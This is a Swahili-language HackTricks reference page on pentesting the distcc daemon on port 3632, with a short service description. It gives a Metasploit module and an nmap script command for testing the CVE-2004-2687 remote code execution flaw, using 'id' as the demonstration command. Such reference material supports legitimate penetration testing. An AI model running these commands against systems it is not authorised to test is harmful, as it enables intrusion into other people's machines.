3632 - Pentesting distcc

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu za usindikaji zilizotulia za kompyuta nyingine kwenye mtandao. Wakati distcc inapowekwa kwenye mashine, mashine hii inaweza kusambaza kazi zake za uundaji kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza daemani ya distccd na lazima awe na kompaila inayoweza kufanya kazi imewekwa ili iprocess nambari iliyotumwa.

Bandari ya chaguo: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Utekaji

Angalia ikiwa ina hatari ya CVE-2004-2687 ya kutekeleza nambari za aina yoyote:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Sidhani shodan inagundua huduma hii.

Vyanzo

Mchapishaji: Álex B (@r1p)

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago